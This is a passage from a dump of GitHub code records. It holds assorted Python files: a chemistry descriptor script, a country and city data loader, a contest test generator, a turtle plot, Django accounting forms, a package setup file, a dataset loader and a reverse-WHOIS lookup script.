descriptor.append(Descriptors.NumHDonors(m)\n                                  )  # H-bond acceptor and donor counts carry information about the molecule's electron distribution\n                descriptor.append(Descriptors.NumHeteroatoms(m))\n                descriptor.append(\n                    Descriptors.NumRotatableBonds(m))  # carries information about the topological structure\n                descriptor.append(Descriptors.NumValenceElectrons(m))  # electronic information\n                descriptor.append(Descriptors.RingCount(m))  # 3D structure and electronic information\n                descriptor.append(Descriptors.TPSA(m))  # polarity and electronic information\n                des = \",\".join([str(item) for item in descriptor]) + \"\\n\"\n                # des[0] = 0\n                f.write(des)\n        except Exception as e:\n            continue\n    print(\"====== Descriptors written ======\")\n    return \n\n\nif __name__ == '__main__':\n    # ms_root = \"./ms_data/hmdb_predicted_cms_peak_lists\"\n    # files = os.listdir(ms_root)\n    # filess = [file[:11] for file in files]\n    # # collect the unique ids\n    # files = list(set(filess))\n    # get_XML(files)\n    # getDescriptors(smiles)\n\n    xml_root = \"./ms_data/msxml\"\n    files = os.listdir(xml_root)\n    ids = []\n    smiles = []\n    id_smiles_file = \"./ms_data/id_smiles.csv\"\n    for file in tqdm(files):\n        with open(id_smiles_file, \"a\") as f:\n            try:\n                name, smile = file[:11], get_smile(file)\n            except Exception as e:\n                continue\n            ids.append(name)\n            smiles.append(smile)\n            f.write(\"{},{}\\n\".format(name, smile))\n    print(\"SMILES collection finished\")\n    get_descriptors(ids, smiles)\n","repo_name":"chensaian/TransG-Net","sub_path":"getms.py","file_name":"getms.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"18533967610","text":"from bs4 import BeautifulSoup\nimport io\nimport csv\nfrom db import mongo_db as db\n\n\ndef read_file(path, encoding=\"utf-8\"):\n    f = io.open(path, mode=\"r\", encoding=encoding)\n    text = f.read()\n    f.close()\n    return text\n\n\ndef
get_soup(path):\n    soup = BeautifulSoup(read_file(path), \"html.parser\")\n    return soup\n\n\ndef country_table(tag):\n    return tag.name == 'table' and tag.has_attr('class') and 'nix' in tag[\"class\"]\n\n\n# a country row has 3 cells of which the first contains a link\ndef country_row(tag):\n    return tag.name == 'tr' and len(tag.find_all(\"td\")) == 3 and tag.td.a\n\n\ndef get_eng_to_german_countries():\n    eng_to_ger = {}\n    soup = get_soup('/Users/roman/PycharmProjects/PersonalLifeCoach/static/countries_deu_eng.html')\n    for table in soup.find_all(country_table):\n        for row in table.find_all(country_row):\n            eng_name = row.td.a.string\n            ger_name = row.find_all(\"td\")[1].string\n            if eng_name and ger_name:\n                eng_to_ger[eng_name] = ger_name\n    return eng_to_ger\n\n\ndef country_codes_row(tag):\n    return tag.name == 'tr' and len(tag.find_all(\"td\")) == 5\n\n\ndef get_country_list():\n    countries = []\n    soup = get_soup('/Users/roman/PycharmProjects/PersonalLifeCoach/static/country_codes.html')\n    for row in soup.table.find_all(country_codes_row):\n        eng_name, alpha2_cd, alpha3_cd, un_cd = row.find_all(\"td\")[1:]\n        if eng_name.em:\n            eng_name = eng_name.em.string\n        elif eng_name.string:\n            eng_name = eng_name.string\n        elif eng_name.a:\n            eng_name = eng_name.a.string\n        if eng_name:\n            countries.append({\n                \"eng_name\": eng_name,\n                \"alpha2_cd\": alpha2_cd.string,\n                \"alpha3_cd\": alpha3_cd.string,\n                \"un_cd\": un_cd.string,\n            })\n    return countries\n\n\ndef csv_row_to_dict(row):\n    return {\n        \"country\": row[\"Country\"].upper(),\n        \"city\": row[\"AccentCity\"],\n        \"lat\": row[\"Latitude\"],\n        \"long\": row[\"Longitude\"]\n    }\n\n\ndef insert_cities():\n    f = io.open(\"/Users/roman/PycharmProjects/PersonalLifeCoach/static/all_cities.txt\", mode=\"r\", encoding=\"utf-8\")\n    csv_reader = csv.DictReader(f)\n    for row in csv_reader:\n        city = csv_row_to_dict(row)\n        db.insert_city(city)\n    f.close()\n\nif __name__ == '__main__':\n    eng_to_ger = get_eng_to_german_countries()\n    print(eng_to_ger)\n    country_list = get_country_list()\n\n    for country in country_list:\n        # add german name if existent\n        if country[\"eng_name\"] in eng_to_ger:\n            country[\"ger_name\"] = eng_to_ger[country[\"eng_name\"]]\n        db.insert_country(country)\n\n    insert_cities()\n","repo_name":"RomanKuratli/PersonalLifeCoach","sub_path":"one_timers/parse_countries_and_cities.py","file_name":"parse_countries_and_cities.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28611657047","text":"from random import *\n\nn = 40000\nm = 5\nq = 40000\nC = 10**6\n\nprint(n, m, q)\n\nW = []\nfor i in range(m):\n    l = randint(-C, C - 1)\n    r = randint(l + 1, C)\n    y = randint(1, C)\n    W.append((l, r, y))\n\ncnt = 0\nwhile cnt < n:\n    x = randint(-C, C)\n    y = randint(1, C)\n    ok = True\n    for i in range(m):\n        if y == W[i][2] and W[i][0] <= x <= W[i][1]:\n            ok = False\n\n    if ok:\n        print(x, y)\n        cnt += 1\n\nfor l, r, y in W:\n    print(l, r, y)\n\nfor i in range(q):\n    x = randint(-C, C)\n    y = randint(1, C)\n    print(x, -y)\n","repo_name":"riteme/test","sub_path":"icpc/2020-9-26/E-gen.py","file_name":"E-gen.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"26752315604","text":"import turtle as t\nimport math\n\nt.speed(10)\nt.setup(width = 1440, height = 900)\nt.hideturtle()\nt.color('black')\n\ndef line(x1,y1,x2,y2): # function that draws the coordinate plane\n    t.up()\n    t.goto(x1,y1)\n    t.down()\n   
t.goto(x2,y2)\n    return\n\ndef write(x,y,text): # write text\n    t.up()\n    t.goto(x,y)\n    t.down()\n    t.write(text)\n    return\n\ndef move(x, y): # pen move function\n    t.up()\n    t.goto(x, y)\n    t.down()\n\nline(-720,0,720,0)\nline(0,-720,0,720)\n\ni=-720 # draw axis tick marks\nwhile i<=720:\n    i=i+90\n    line(i,-5,i,5)\n    write(i-10,-20,i)\n\ni = -720\nwhile i <= 720:\n    i = i+90\n    line(-5, i, 5, i)\n    write(7, i-5, i)\n\nt.color('red')\nmove(-720, 0)\nfor x in range(-360*3, 360*3):\n    t.goto(x, 90*math.sin(x*3.14/180))\n\nt.color('blue')\nmove(-720, 0)\nfor x in range(-360*3, 360*3):\n    t.goto(x, 90*math.cos(x*3.14/180))\n\nt.done()","repo_name":"doubleyou77/samgagbi_math","sub_path":"sin_cos_function.py","file_name":"sin_cos_function.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7100517912","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.db import transaction\nfrom django.forms import BaseInlineFormSet, inlineformset_factory\nfrom djmoney.forms import MoneyField\nfrom moneyed import Money\nfrom mptt.forms import TreeNodeChoiceField\n\nfrom hordak.defaults import CURRENCIES, DECIMAL_PLACES, DEFAULT_CURRENCY, MAX_DIGITS\nfrom hordak.models import Account, Leg, Transaction\n\n\nclass SimpleTransactionForm(forms.ModelForm):\n    \"\"\"A simplified form for transferring an amount from one account to another\n\n    This only allows the creation of transactions with two legs. This also uses\n    :meth:`Account.transfer_to()`.\n\n    See Also:\n\n        * :meth:`hordak.models.Account.transfer_to()`.\n    \"\"\"\n\n    from_account = TreeNodeChoiceField(\n        queryset=Account.objects.all(), to_field_name=\"uuid\"\n    )\n    to_account = TreeNodeChoiceField(\n        queryset=Account.objects.all(), to_field_name=\"uuid\"\n    )\n    amount = MoneyField(max_digits=MAX_DIGITS, decimal_places=DECIMAL_PLACES)\n\n    class Meta:\n        model = Transaction\n        fields = [\"amount\", \"from_account\", \"to_account\", \"date\", \"description\"]\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n        # Limit currency choices if setup\n        default_currency = DEFAULT_CURRENCY\n        amount_field, currency_field = self.fields[\"amount\"].fields\n\n        currencies = CURRENCIES() if callable(CURRENCIES) else CURRENCIES\n        self.fields[\"amount\"].widget.widgets[1].choices = currency_field.choices = [\n            (code, name)\n            for code, name in currency_field.choices\n            if code == default_currency or code in currencies\n        ]\n        self.fields[\"amount\"].initial[1] = default_currency\n\n    def save(self, commit=True):\n        from_account = self.cleaned_data.get(\"from_account\")\n        to_account = self.cleaned_data.get(\"to_account\")\n        amount = self.cleaned_data.get(\"amount\")\n\n        return from_account.transfer_to(\n            to_account=to_account,\n            amount=amount,\n            description=self.cleaned_data.get(\"description\"),\n            date=self.cleaned_data.get(\"date\"),\n        )\n\n\nclass TransactionForm(forms.ModelForm):\n    \"\"\"A form for managing transactions with an arbitrary number of legs.\n\n    You will almost certainly\n    need to combine this with :class:`LegFormSet` in order to\n    create & edit transactions.\n\n    .. note::\n\n        For simple transactions (with a single credit and single debit) you are probably\n        better off using the :class:`SimpleTransactionForm`.
This significantly simplifies\n both the interface and implementation.\n\n Attributes:\n\n description (forms.CharField): Optional description/notes for this transaction\n\n See Also:\n\n This is a `ModelForm` for the :class:`Transaction model `.\n \"\"\"\n\n description = forms.CharField(label=\"Transaction notes\", required=False)\n\n class Meta:\n model = Transaction\n fields = (\"description\",)\n\n def save(self, commit=True):\n return super(TransactionForm, self).save(commit)\n\n\nclass LegForm(forms.ModelForm):\n \"\"\"A form for representing a single transaction leg\n\n Attributes:\n\n account (TreeNodeChoiceField): Choose an account the leg will interact with\n description (forms.CharField): Optional description/notes for this leg\n amount (MoneyField): The amount for this leg.\n Positive values indicate money coming into the transaction,\n negative values indicate money leaving the transaction.\n\n See Also:\n\n This is a `ModelForm` for the :class:`Leg model `.\n \"\"\"\n\n account = TreeNodeChoiceField(Account.objects.all(), to_field_name=\"uuid\")\n description = forms.CharField(required=False)\n amount = MoneyField(\n required=True, max_digits=MAX_DIGITS, decimal_places=DECIMAL_PLACES\n )\n\n class Meta:\n model = Leg\n fields = (\"amount\", \"account\", \"description\")\n\n def __init__(self, *args, **kwargs):\n self.statement_line = kwargs.pop(\"statement_line\", None)\n super(LegForm, self).__init__(*args, **kwargs)\n\n def clean_amount(self):\n amount = self.cleaned_data[\"amount\"]\n if amount.amount <= 0:\n raise ValidationError(\"Amount must be greater than zero\")\n\n if self.statement_line and self.statement_line.amount < 0:\n amount *= -1\n\n return amount\n\n\nclass BaseLegFormSet(BaseInlineFormSet):\n def __init__(self, **kwargs):\n self.statement_line = kwargs.pop(\"statement_line\")\n self.currency = self.statement_line.statement_import.bank_account.currencies[0]\n super(BaseLegFormSet, self).__init__(**kwargs)\n\n def get_form_kwargs(self, index):\n kwargs = super(BaseLegFormSet, self).get_form_kwargs(index)\n kwargs.update(statement_line=self.statement_line)\n if index == 0:\n kwargs.update(\n initial=dict(\n amount=Money(abs(self.statement_line.amount), self.currency)\n )\n )\n return kwargs\n\n def clean(self):\n super(BaseLegFormSet, self).clean()\n\n if any(self.errors):\n return\n\n amounts = [f.cleaned_data[\"amount\"] for f in self.forms if f.has_changed()]\n if Money(self.statement_line.amount, self.currency) != sum(amounts):\n raise ValidationError(\n \"Amounts must add up to {}\".format(self.statement_line.amount)\n )\n\n\nLegFormSet = inlineformset_factory(\n parent_model=Transaction,\n model=Leg,\n form=LegForm,\n extra=4,\n can_delete=False,\n formset=BaseLegFormSet,\n)\n\n\nclass CurrencyTradeForm(forms.Form):\n source_account = forms.ModelChoiceField(\n queryset=Account.objects.filter(children__isnull=True), to_field_name=\"uuid\"\n )\n source_amount = MoneyField(max_digits=MAX_DIGITS, decimal_places=DECIMAL_PLACES)\n trading_account = forms.ModelChoiceField(\n queryset=Account.objects.filter(\n children__isnull=True, type=Account.TYPES.trading\n ),\n to_field_name=\"uuid\",\n help_text=\"The account in which to perform the trade. \"\n \"This account must support both the source and destination currency. 
If none exists, \"\n        \"perhaps create one.\",\n    )\n    destination_account = forms.ModelChoiceField(\n        queryset=Account.objects.filter(children__isnull=True), to_field_name=\"uuid\"\n    )\n    destination_amount = MoneyField(\n        max_digits=MAX_DIGITS, decimal_places=DECIMAL_PLACES\n    )\n    description = forms.CharField(widget=forms.Textarea, required=False)\n\n    def clean(self):\n        cleaned_data = super(CurrencyTradeForm, self).clean()\n        if self.errors:\n            return cleaned_data\n\n        source_account = cleaned_data[\"source_account\"]\n        source_amount = cleaned_data[\"source_amount\"]\n        trading_account = cleaned_data[\"trading_account\"]\n        destination_amount = cleaned_data[\"destination_amount\"]\n        destination_account = cleaned_data[\"destination_account\"]\n\n        if source_amount.currency.code not in source_account.currencies:\n            raise ValidationError(\n                \"Source account does not support {}\".format(source_amount.currency)\n            )\n        if source_amount.currency.code not in trading_account.currencies:\n            raise ValidationError(\n                \"Trading account does not support {}\".format(source_amount.currency)\n            )\n        if destination_amount.currency.code not in trading_account.currencies:\n            raise ValidationError(\n                \"Trading account does not support {}\".format(destination_amount.currency)\n            )\n        if destination_amount.currency.code not in destination_account.currencies:\n            raise ValidationError(\n                \"Destination account does not support {}\".format(\n                    destination_amount.currency\n                )\n            )\n\n        return cleaned_data\n\n    @transaction.atomic()\n    def save(self):\n        source_account = self.cleaned_data.get(\"source_account\")\n        trading_account = self.cleaned_data.get(\"trading_account\")\n        destination_account = self.cleaned_data.get(\"destination_account\")\n        source_amount = self.cleaned_data.get(\"source_amount\")\n        destination_amount = self.cleaned_data.get(\"destination_amount\")\n\n        transaction = Transaction.objects.create(\n            description=self.cleaned_data.get(\"description\")\n        )\n        Leg.objects.create(\n            transaction=transaction, account=source_account, amount=source_amount\n        )\n        Leg.objects.create(\n            transaction=transaction, account=trading_account, amount=-source_amount\n        )\n        Leg.objects.create(\n            transaction=transaction, account=trading_account, amount=destination_amount\n        )\n        Leg.objects.create(\n            transaction=transaction,\n            account=destination_account,\n            amount=-destination_amount,\n        )\n        return transaction\n","repo_name":"adamcharnock/django-hordak","sub_path":"hordak/forms/transactions.py","file_name":"transactions.py","file_ext":"py","file_size_in_byte":9112,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"78"} +{"seq_id":"6336095299","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport re\nimport os\nfrom setuptools import setup, find_packages\n\nEXTRAS_REQUIRE = {\n    \"tests\": [\"pytest\", \"mock\", \"pytest-django==3.10.0\", \"factory-boy==2.11.1\"],\n    \"lint\": [\n        \"flake8==5.0.4\",\n        'flake8-bugbear==18.8.0; python_version >= \"3.5\"',\n        \"pre-commit==2.17.0\",\n    ],\n}\nEXTRAS_REQUIRE[\"dev\"] = (\n    EXTRAS_REQUIRE[\"tests\"] + EXTRAS_REQUIRE[\"lint\"] + [\"konch>=3.0.0\", \"tox\"]\n)\n\n\ndef find_version(fname):\n    \"\"\"Attempts to find the version number in the file named fname.\n    Raises RuntimeError if not found.\n    \"\"\"\n    version = \"\"\n    with open(fname, \"r\") as fp:\n        reg = re.compile(r'__version__ = [\\'\"]([^\\'\"]*)[\\'\"]')\n        for line in fp:\n            m = reg.match(line)\n            if m:\n                version = m.group(1)\n                break\n    if not version:\n        raise RuntimeError(\"Cannot find version information\")\n   
return version\n\n\ndef read(fname):\n with open(fname) as fp:\n content = fp.read()\n return content\n\n\nsetup(\n name=\"django-elasticsearch-metrics\",\n version=find_version(os.path.join(\"elasticsearch_metrics\", \"__init__.py\")),\n author=\"Steven Loria, Dawn Pattison\",\n author_email=\"steve@cos.io, pattison.dawn@cos.io\",\n description=\"Django app for storing time-series metrics in Elasticsearch.\",\n long_description=read(\"README.md\"),\n long_description_content_type=\"text/markdown\",\n url=\"http://github.com/CenterForOpenScience/django-elasticsearch-metrics\",\n license=\"MIT\",\n packages=find_packages(exclude=(\"tests\",)),\n keywords=(\n \"django\",\n \"elastic\",\n \"elasticsearch\",\n \"elasticsearch-dsl\",\n \"time-series\",\n \"metrics\",\n \"statistics\",\n ),\n install_requires=[\"elasticsearch-dsl>=6.3.0,<7.0.0\"],\n extras_require=EXTRAS_REQUIRE,\n classifiers=[\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Framework :: Django\",\n \"Framework :: Django :: 1.11\",\n \"Framework :: Django :: 2.0\",\n \"Framework :: Django :: 2.1\",\n \"Framework :: Django :: 2.2\",\n \"Framework :: Django :: 3.0\",\n \"Framework :: Django :: 3.1\",\n \"Framework :: Django :: 3.2\",\n \"Framework :: Django :: 4.0\",\n \"Framework :: Django :: 4.1\",\n \"Environment :: Web Environment\",\n \"Intended Audience :: Developers\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n zip_safe=False,\n include_package_data=True,\n project_urls={\n \"Issues\": \"https://github.com/CenterForOpenScience/django-elasticsearch-metrics/issues\",\n \"Changelog\": \"https://github.com/CenterForOpenScience/django-elasticsearch-metrics/blob/master/CHANGELOG.md\",\n },\n)\n","repo_name":"CenterForOpenScience/django-elasticsearch-metrics","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"16874834730","text":"from preprocessing.graph_creator import Sentence\n\nimport json\nfrom collections import defaultdict\nfrom copy import deepcopy\nfrom typing import Dict, List, Iterable\nimport logging\nfrom multiprocessing import Pool\nfrom functools import partial\n\n# import line_profiler\n# import atexit\n# profile = line_profiler.LineProfiler()\n# atexit.register(profile.print_stats)\n\n\nLOGGER = logging.getLogger(__name__)\nLOGGER.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(level=logging.INFO)\nLOGGER.addHandler(ch)\n\ndef read_trex(file_path):\n\n with open(file_path, 'r') as json_file:\n data = json.load(json_file)\n\n return data\n\n\ndef find_linked_entities(trex_list: List[dict]) -> Dict[str, set]:\n doc_entities = list()\n for current_doc in trex_list:\n doc_entities.extend([each for each in current_doc['entities'] if 'Entity' in each['annotator']])\n\n wiki2surfaceform = defaultdict(set)\n for entity_dict in doc_entities:\n wiki2surfaceform[entity_dict['uri']].add(entity_dict['surfaceform'])\n\n return wiki2surfaceform\n\n\ndef remove_overlapping_sentence_entities(sentence_entities):\n def range_in(range_set, range_):\n return 
any([range_[0] >= each_range[0] and range_[1] <= each_range[1] for each_range in range_set])\n\n def range_partially_in(range_set, range_):\n return any([(range_[0] >= each_range[0] and range_[0] <= each_range[1]) or\n (range_[1] >= each_range[0] and range_[1] <= each_range[1]) for each_range in range_set])\n\n range_set = set(sentence_entities.keys())\n range_set_2 = deepcopy(range_set)\n\n for range_, sentence_entity_dict in list(sentence_entities.items()):\n exclude_range_from_range_set = {each for each in range_set if each != range_}\n exclude_range_from_range_set_2 = {each for each in range_set_2 if each != range_}\n if range_in(exclude_range_from_range_set, range_):\n del sentence_entities[range_]\n elif range_partially_in(exclude_range_from_range_set_2, range_):\n del sentence_entities[range_]\n range_set_2.remove(range_)\n\n\ndef _get_sentence_text_and_entities(trex_list: List[dict]) -> Iterable[Sentence]:\n\n for current_doc in trex_list:\n doc_entities = [each for each in current_doc['entities'] if 'Entity' in each['annotator']]\n doc_list = list()\n for sentence_boundary in current_doc['sentences_boundaries']:\n sentence_entities = deepcopy([each for each in doc_entities if\n each['boundaries'][1] <= sentence_boundary[1] and each['boundaries'][0] >=\n sentence_boundary[0]])\n for each in sentence_entities:\n each['boundaries'] = [each['boundaries'][0] - sentence_boundary[0],\n each['boundaries'][1] - sentence_boundary[0]]\n\n sentence_entities_dict = {tuple(each['boundaries']): each for each in sentence_entities}\n sentence_text = current_doc['text'][sentence_boundary[0]: sentence_boundary[1]]\n doc_list.append((sentence_text, sentence_entities_dict, current_doc))\n\n yield doc_list\n\n# @profile\ndef iterate_sentences_from_trex(trex_list: List[dict]) -> Iterable[Sentence]:\n wiki2surfaceform = find_linked_entities(trex_list)\n LOGGER.info('Number of documents in this file : {}'.format(len(trex_list)))\n\n sentence_id = 0\n pool = Pool(processes=4)\n create_sentence_partial = partial(create_sentence, wiki2surfaceform=wiki2surfaceform)\n\n for doc_num, doc_list in enumerate(_get_sentence_text_and_entities(trex_list)):\n doc_list_with_sentence_id = list()\n for sentence_number, (sentence_text, sentence_entities, doc_info) in enumerate(doc_list):\n remove_overlapping_sentence_entities(sentence_entities)\n doc_list_with_sentence_id.append((sentence_id, sentence_text, sentence_entities, doc_info))\n LOGGER.info('Processed {} sentences in {}/{} docs'.format(sentence_number + 1, doc_num + 1, len(trex_list)))\n LOGGER.info('Sentence Text : {}'.format(sentence_text))\n sentence_id += 1\n\n for sentence_number, (sentence_id, sentence_text, sentence_entities, doc_info) in enumerate(doc_list_with_sentence_id):\n LOGGER.info('Processed {} sentences in {}/{} docs'.format(sentence_number + 1, doc_num + 1, len(trex_list)))\n LOGGER.info('Sentence Text : {}'.format(sentence_text))\n yield create_sentence_partial(sentence_id, sentence_text, sentence_entities, doc_info)\n\n # for sentence in pool.starmap(create_sentence_partial, doc_list_with_sentence_id):\n # yield sentence\n\n# @profile\ndef create_sentence(id_counter, sentence_text, sentence_entities, doc_info, wiki2surfaceform=None):\n sentence = Sentence(id=id_counter,\n sentence_text=sentence_text,\n sentence_entities=sentence_entities,\n wiki2surfaceform=wiki2surfaceform,\n doc_info=doc_info)\n sentence.create_graph()\n\n return 
sentence\n\n","repo_name":"issafuad/KnowledgeLM","sub_path":"preprocessing/dataset_loader.py","file_name":"dataset_loader.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34946884191","text":"#Made for the sole purpose of GCI 2019\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs4\r\ndef prRed(skk): return str(\"\\033[91m {}\\033[00m\" .format(skk)) \r\ndef prYellow(skk): return str(\"\\033[93m {}\\033[00m\" .format(skk)) \r\ndef prPurple(skk): return str(\"\\033[95m {}\\033[00m\" .format(skk)) \r\ndef prCyan(skk): return str(\"\\033[96m {}\\033[00m\" .format(skk)) \r\ndef main():\r\n\tprint()\r\n\tquery = input(prRed(\"Enter the name of individual person or a company:\"))\r\n\tprint()\r\n\tlink = \"https://viewdns.info/reversewhois/?q=\" + query\r\n\tuser = \"Mozilla/5.0 (X11; Linux i586; rv:71.0) Gecko/20100101 Firefox/71.0\"\r\n\theaders = {\"User-Agent\": user}\r\n\trequest = requests.get(link, headers=headers) #requesting the page to get information according to query \r\n\ttable1 = bs4(request.content, \"html5lib\") #getting the contents of that page\r\n\ttable1 = table1.findAll('table')[3].encode() # finding the appropriate table\r\n\ttry1 = bs4(table1, \"html5lib\")\r\n\trow = try1.findAll('tr') #converting the table to readable format\r\n\ttest=1\r\n\tmainlist=[]\r\n\tfor i in row:\r\n\t\tif test==1:\r\n\t\t\ttest+=1 \r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tx=str(i) #Finding and sorting the elements of the table\r\n\t\t\ty=x.split(\"\") \r\n\t\t\ttmplist=[]\r\n\t\t\tfor j in y:\r\n\t\t\t\tif j=='':\r\n\t\t\t\t\tcontinue\r\n\t\t\t\telse:\r\n\t\t\t\t\tz=j[:-5]\r\n\t\t\t\t\tif \"\" in z:\r\n\t\t\t\t\t\tz=z[:-5]\r\n\t\t\t\t\tif z==\"\":\r\n\t\t\t\t\t\tz=\"N/A\"\r\n\t\t\t\t\ttmplist.append(z)\r\n\t\t\tmainlist.append(tmplist)\r\n\t\r\n\tif len(mainlist)==0:\r\n\t\tprint(prRed(\"Insufficient Data\"))\r\n\telse:\r\n\t\tprint(\"{:53}{:39}{}\".format(prRed(\"Domain Name\"),prRed(\"Creation Date\"),prRed(\"Registrar\")))\r\n\t\tprint()\r\n\t\tfor l in mainlist:\r\n\t\t\ttmpx=l[0]\r\n\t\t\ttmpy=l[1]\r\n\t\t\ttmpz=l[2]\r\n\t\t\tprint(\"{:54}{:35}{}\".format(prPurple(tmpx),prYellow(tmpy),prCyan(tmpz))) #Printing the output\r\n\t\t\tprint()\r\n\t\r\n\txt=input(prCyan(\"Do you wish to continue?[y/N]:\"))\r\n\tprint()\r\n\tif xt==\"y\":\r\n\t\tmain()\r\n\tif xt==\"N\":\r\n\t\tprint(prRed(\"Closing...\"))\r\n\t\treturn None\r\n\telse:\r\n\t\treturn None\r\nmain() #parent function called at start\r\n","repo_name":"Ayush19-01/GCI-Reverse-WHOIS","sub_path":"reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"40311529665","text":"from app import app\nfrom flask import jsonify, request\nfrom sklearn.datasets import load_files\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nimport operator\n\nuza = load_files('.\\\\uza')\n\ncount_vect = CountVectorizer()\nX_train_counts = count_vect.fit_transform(uza.data)\nclf = MultinomialNB().fit(X_train_counts, uza.target)\ncategories = uza.target_names\n\n\n@app.route('/', methods=['POST'])\ndef index():\n global count_vect, clf, categories\n \n content = request.get_json() \n text = content.get('content') \n\n X_new_counts = count_vect.transform([text]) \n proba = clf.predict_proba(X_new_counts)\n norm = [float(i)/sum(proba[0]) for i in proba[0]] \n p_dict 
= dict(zip(categories, norm))\n    sorted_dic = sorted(p_dict.items(), key=operator.itemgetter(1), reverse=True)\n    return jsonify(labels=categories, data=norm, dict=sorted_dic)","repo_name":"lochin/mt","sub_path":"server/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7510277606","text":"import numpy as np\n\n\nfrom itertools import combinations\n\nclass MoeadUtils:\n\n    def __init__(self,\n                 problem):\n\n        self.problem = problem\n\n    def factorial(self, n):\n        result = 1\n        for i in range(2, n + 1):\n            result *= i\n        return result\n\n    def comb(self, n, k):\n        return self.factorial(n) / (self.factorial(n - k) * self.factorial(k))\n\n    #Simplex Lattice Design\n    def UniformPoint(self, N, M):\n        try:\n            H1 = 1;\n            while (self.comb(H1 + M, M - 1) <= N):\n                H1 = H1 + 1\n\n            temp1 = list(combinations(np.arange(H1 + M - 1), M - 1))\n            temp1 = np.array(temp1)\n            temp2 = np.arange(M - 1)\n            temp2 = np.tile(temp2, (int(self.comb(H1 + M - 1, M - 1)), 1))\n            W = temp1 - temp2\n            W = (np.concatenate((W, np.zeros((np.size(W, 0), 1)) + H1), axis=1) - np.concatenate(\n                (np.zeros((np.size(W, 0), 1)), W), axis=1)) / H1\n\n            if H1 < M:\n                H2 = 0\n                while (self.comb(H1 + M - 1, M - 1) + self.comb(H2 + M, M - 1) <= N):\n                    H2 = H2 + 1\n                if H2 > 0:\n                    temp1 = list(combinations(np.arange(H2 + M - 1), M - 1))\n                    temp1 = np.array(temp1)\n                    temp2 = np.arange(M - 1)\n                    temp2 = np.tile(temp2, (int(self.comb(H2 + M - 1, M - 1)), 1))\n                    W2 = temp1 - temp2\n                    W2 = (np.concatenate((W2, np.zeros((np.size(W2, 0), 1)) + H2), axis=1) - np.concatenate(\n                        (np.zeros((np.size(W2, 0), 1)), W2), axis=1)) / H2\n                    W = np.concatenate((W, W2 / 2 + 1 / (2 * M)), axis=0)\n\n            realN = np.size(W, 0)\n            W[W == 0] = 10 ** (-6)\n            if N!=realN:\n                raise Exception(\"Population size unavailable for the specified number of objectives.\")\n            return W, realN\n        except Exception as error:\n            print(\"Error while defining the weight vectors: \" + repr(error))\n\n    # Define the neighborhoods\n    def FindNeighbour(self, W, N, M, T):\n        B = []\n        for i in range(N):\n            temp = []\n            for j in range(N):\n                distance = 0\n                for k in range(M):\n                    distance += (W[i][k] - W[j][k]) ** 2\n                distance = np.sqrt(distance)\n                temp.append(distance)\n            index = np.argsort(temp)\n            B.append(index[:T])\n        return B\n\n\n    #set the initial reference point\n    def find_best(self, population):\n        z = [np.inf for i in range(len(population.population[0].objectives))]\n        for individual in population:\n            for i in range(len(z)):\n                if individual.objectives[i] < z[i]:\n                    z[i] = individual.objectives[i]\n        return z\n\n    #update reference point\n    def update_reference_point(self, y, z):\n        for j in range(len(z)):\n            if self.problem.directions[j] == \"max\":\n                if y.objectives[j] > z[j]:\n                    z[j] = y.objectives[j]\n            else:\n                if y.objectives[j] < z[j]:\n                    z[j] = y.objectives[j]\n\n    def Tchebycheff(self, individual, weight, z):\n        temp = []\n        for i in range(len(individual.objectives)):\n            temp.append(weight[i] * np.abs(individual.objectives[i] - z[i]))\n\n        return np.max(temp)","repo_name":"mbdemoraes/IEEE_RandomForestHyperParameters","sub_path":"common/moead_utils.py","file_name":"moead_utils.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"11684996271","text":"from PySide6.QtWidgets import (\n    QCheckBox,\n    QDialog,\n    QDialogButtonBox,\n    QVBoxLayout,\n    QLabel,\n    QLineEdit,\n)\n\nclass ApiKeyDialog(QDialog):\n\tdef
